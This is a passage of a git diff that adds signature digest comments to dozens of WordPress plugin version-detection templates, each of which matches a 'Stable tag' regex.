6bc2aa78f9..ff1ab42fe9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cb930bf1dd3719ab9c26570f833dc732bfe6c179ab350976bbaeb171666ea83d022100c14040f70b6fbe70f9c892929b1807fa3c0c56f2a666ff54b23a9f16e9499796:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..dfcc17866a 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207404d5b33d9a0bf724acb5e8e75381095db80afbcef1db86226915d372b0157c022100bd4441ec24d8472362955f37594d5cea6490e2f2e7471617a262c938f1fdd16e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..ae904072ad 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d148f126b7df186977b09f6a4c9fef3999b7a00fc5c98855f3b32993d3a62df5022100bbe80231c68b9f954673ba1d72b4105f63a127d53d1410b73669d028867e7a70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..b8a0c65596 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204651ba300c511713102313e4966c96b681dad467bf9182d365357eb247a70816022100df4e435616867acb4f1bba06472790e3ac0a9d760c6865539a64125eb92c4364:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d1..ef76e9fd27 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207bfb59b71dd73051065f3c5639b2ad039367624f6e5703652cd55f5507f9087a022100f6fdb7a4dd53190964fadde93b71826caa86f42417515db5b24ed6b7a87292bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..2992da2f2f 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100859cafca079a32d131d72d3974f2149455ae515f0a2d0812ba29544e2c0479fb0221009cf24879d1af5cd936d19cf1ed4e4e718b150be9cb0bbe5b258597c2e986d32e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..9322a00b26 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fbd17613eac54169d0b6e55051216964bfdead93ab1cbf99d053d3303589043002205173801779b8c34da48bb29afef2253dd3c8febf8ac09089497d0574258b1781:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..1b705a50c3 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202d7a347cbc0d584deb170c7db8044b2e6195a89589994aeebcaf9ee2252ef01f022100afee5ffee0d4cbd88b304990660e7aec2a96b060cf571ad8a3bdd11d40cd16e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..2d4f20d32b 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d083e7e4a55311a3408f62ec55b001eb52fff5f36ded8f2f1a9f10fbb48a5b43022100f3f0cb578a283fdf8c7bd9ce5b6c4dd41f578ceb739c430a60e52b8f8882d04c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..07fd473237 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100efcc40cc0e96ad2045b1e1cd1a42fe5492077c532e9dfe9aed6750b78d2b9c4802206de0b24096c443c64381230d948f2fff76af3a783bd765a5fe20e80ca950172b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 00eb1e2dfc..69a36bb5e8 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ecdf3d2cd15c1e801e3647bae282f25236e2747f9ef4879e572800d240692e640221008e4813a7f08ee4c7c45c864e7d0dad771ff8d1dbcdd15bf02b8281c2df6bfd7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..d1bcac22a3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f65773b65949fb183e21f197f8929710dc039141573aeff488331618795a7a2102200f437df95426f22e822791c702c98f3fce6694b483324ec2b1478ea2bc8aaab9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db68..e192bf7477 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c479299b5a39b6b59e03e6f43d70e01f10a1ac876a93dee67be52a900d78e57a022100c28b8aa98bc0fe02481300ab5906944da0892aeacddfe1605f4d67dea0b82d12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..4c49399096 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022057304a885921ec6a8313993998d794a4c1366b011acd5c352e94c1b10674f9cb0221008e24c7f283320abc9fb059a5fcf4fba28ece98001ed8f67764907f7bb2b67ac1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..d4bad3a889 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a0ccfe4a6180cf64f6a9c0a3d60a76bc9926f9be7741c8f67000447f014578ac022100aed0fb31152f3c0cef3c87dc13123254d225ef9895f8c02372f2a631c33412e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..fddf414921 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204b7adc761f7e7efc3979bf8a1f903d386544f716e168a76ebb5984139c6356b1022100b05b5ec29bc5164899adbfa086ab6db3ad01a7defc4d9d1cf142460b66f25774:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..7a15da40ae 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220328979917d0aefa1414affe9c95545ca912895aeb1ffd595123e1d0f732799af02206c07b524647cf29cc4ee15442ab3d2019ac2ac3618282b24c33a2417aed1349f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed5..ee9f33a75b 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e16a0d5f395a7e6cc5a1ddadf8125245ec7c369995a206e495848bd1bcb2de5f022100a475e756387f0c222d4851a8569179b8636ace4b6c175483f8c93d55f737bd45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..00292a0b43 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022019fbd1b0e5e19a2a0b6de6557b4663a36cc6d438a558f6174eac50465bb7af97022100ce97af8a1b2410a32c58869d5627dcc01f2f1f5116f0c25c6f5b87d5697557b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..34fab4f40f 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022048e76dc56ac458c986968b85b00250b1da3fc52469bef5cf399862f83aec4bee022100942164f7a488214011f20b34b88088c2052cc412a90fa5d94f8c039f51ac94a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..d3f0ccb309 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100defb1f5fb6a12944996e8487c583c638becd2022516045f5c689b9196a3d3038022100a0ebcc3a5f7170d87d37e234d2718b6ebfd2a3c471742be164b3b4e879cf5f6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..7bb408760c 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008e5a0cc77b68af4a58da2212cb9698b32fbbedf5f69a8c7aa11787c51ffb10b0022100e22d42da4821ad29f8f19ab1fcf757e5bb11934652393426f96599a2209af25f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..c01fef6467 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220248cb80d81879604cbfb6fc14c256ea2e2f88f07b21e0f0585a73a6d1ae5a651022100882881a050c4114e433505203e2a1dbc18c33a8e50fc4bcdd09421b0c02b577d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..bc6baec824 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220561d011d797ae882b4e881bf6da00470ed8fe77106d2d1209754d880b90f6a1102201cd906132ef820467a8d4f23a02f8fbb87b811b163e1871a4d9e403dd5b26bc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..352d806edb 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a44a827f9d703e64030affb0cfd00d23ca5d07b8bb7b47514529848f9af0a46902203f2fbe01a2be127a6ebe4fac0f90549fcfd47762765380b2d17c2639d09e2ddf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..996274f067 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220593177ff9680e65512c2258842a83ebbd32ff0d1a01d8038d1501f34c289ae68022100e3ef4c76c6073eec90b2b3c27e55ac838318605e56094cd7d4944917dbb69e28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..3d4d5814ec 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f22983fcd88588e24090fd33dfb7adeba111c9b802eaff4f3918ec7c12a18503022100d82a1f726b982661c557c71baedc0f90ea102eb7f21430d105ba8dc7e15b3fd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..49ed27ad2a 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d2672404b5de949267aa8cf4b2d42a3e10ccca5baf6ec5e6c6c3612bcdfa452a02204a7c0ffd7394335581ec284ac77056fdba1aa90cb1a1f9705137dc32e1e74472:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..13a2edc7b2 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ddb14a14161905059934162ffd7665ca5b6301eb54001e8311cd2c2a3f9ebf730220568fa65068a6a10a50ebb53d3a3b93423ce86ca3e81a3102405bc9c65383deca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..a5dcd19926 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203f5bc03695192782d1c4d6df8a7ac8ff309cf47726e0e489b3e05801bb69623502205cb312cd80a678908fd66a0ecd8cbd8fd64f99489d060569c65bd9fbef78032a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..8f74148fc4 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205073a006c158c2d04545b93e5da61919d5b0ffacbb08157b55ba1a601ee38f45022100f4ea0824db7d0589c0507f64f028775db9e54c4f6133f27d6ee25f9d281fbee3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 4f99876557..dab03e8bf1 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009baf94181c758b383ed4ba1417de79dcc91d7d10cbf38317fc0c190842a4f1f7022100e0ef7c121e91b929fb5a756d08bafddca874dcc407f59ad4dde339de6f565e61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..91741c35f3 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009a39edb024b9c530bf9d903e23dae42b4d4cb9673bb46be96e923e953ad8964b0220018f63f09668642f16ba1baaae1713f528f113e83fdd8f478a4e52db36929f53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d..595e14fad9 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cf3078969484709c91503a66352a8f2e632b5729b9c2221b8367a690963ccfdb022100c273ddd018cc561d778b792d8181d7bc19214e99713d99e97392ea52c73a7a40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..8a003bf950 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aaa4affb4e6b88677f4b8ce0acff78b393c54c9541d6cc875752fa747a260c2c022002fa58c432c74b2610bdc9dd2182d4aaf92d2b1c3cf8af01e3e9bc1fc87fdf52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..0804a7040d 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a56b5d66ab0aa85cbbf5b4cec5946cdd674250f0bfc4e923abe50458b823f1fd022100dcb430d7a6ec0c75fe2bd5034ff60ebb043b5fafa8d476c5d1e32bd52f16a9da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..2270bbf7a3 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008032f17fe53c4d013fea9ac4d9456a01ad9d51da85f031402a1625ae927fc99502207bfc839505eff9021e4104331bb8118d0e99583345b9b67070d10e11136550f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..d2236fbbcc 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022049f2957ce2c39bb263fa7d1ee4de16e272c340fa0c3d3381b251af393a8751c102205132d43d8c4bc020dd8dcf2d20e526673a56b069112a37187d77fb353e4d9549:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..ee9abee9b1 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a570236a6d3ef7a4a2625f35f3f057f749f6e86e9c4f170a9ab911212dad8ea602207a1111b2358d7d016e9f72fa92b5438b60787c6cb6a16972a793dcac442e0faa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..fcef4cf8ce 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ee04c916a5f6991c280422273c9862f8e7f68aa382fc63c0f339a6945069bea6022100975fd519013f17dd1002c59fb7a6bad05e835dde2b8cd7462ba9fe9087406a88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..d7ad900d8f 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207a1171f4dd5bb81cdbc25568448600331c13f1947da34130557034490f347be8022016d7b61e6067953455435251151af010456102d5fd941039ae1127be040448c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..46f236e399 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dcf466aceb4606217db204b58c0a6c89d5787bd588723333724bece7832d9c6a022011f52cb26d3174bddd334e95c3d7b485e89aafc29380c8f17a2591f0bdb4b1a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..d074a27def 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d761fb1287c7d4e2306da854d2efe9dea27c4325eb76d2bc12ea818f5d5c091b022074e578c9635339453a76fbb55b2547877a0d514e027e74b6bef8b21728b23b17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..6d0b7fa0cd 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a4d460797062a547c1a810f4d4d3ac13d0d3f000bc687683833c36fb2f6b8687022100d7a0ab3e73f0ee93f56a3c494ac199ffe3e1eaaed7aa3d5fa584c61206d8ae79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..6615ee4eab 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022003e1e593d21d00547bbcc8aaeaa124fa3a4d3922a3f287195724e9cec05579b6022065ab16548124c50a4a34949a5540da475e73bc21d31f5dcea004b40ca68cff9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..91f139e5b8 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220750387cb0edff789b44acbfa47d73e33e729d562de643274ead8e842d6bdd234022100c138f830f1b1f98d3d80b68398b2ca1cd79a1b0f366d1ece1ca0c5a57f133886:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c27682..f8071b5b02 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100afac994865a3974329c64c072965da8d7ad6983d22a2110af1024da7c57a529502207b2b0bee48dd517038f29e70c7e4cda7fa976725c2f1037aa827684c6d89861d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..d3c83e6fb6 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 